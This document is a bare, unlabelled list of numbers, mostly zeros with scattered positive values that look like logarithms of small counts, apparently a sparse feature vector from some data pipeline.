0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 10.532317184711113, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.924066185063897, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 3.7369991058576035, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.518263445217987, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.969640753475787, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.9384838577066197, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.292763799896557, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.9120230054281455, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 5.8377304471659395, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2958368660043296, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.5649493574615367, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 2.833213344056216, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8005740880419454, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 6.9558749307258045, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.295836866004329, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, 0.0, 1.3862943611198906, 0, 0, 0, 0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 4.770684624465665, 0, 0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.3322045101752034, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.454347296253507, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6888794541139363, 0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.795790545596741, 2.833213344056216, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 8.73323621912248, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 8.105134969404936, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 3.2188758248682006, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.07753744390572, 0.0, 0, 0.0, 0, 4.605170185988092, 3.295836866004329, 0, 0, 0.0, 3.7376696182833684, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.784189633918261, 0.0, 0.0, 0.0, 3.3322045101752034, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.649511027115099, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 8.87326690740586, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.23410650459726, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 2.550898738446989, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0, 0, 0, 0, 1.6094379124341003, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 15.257339727119625, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 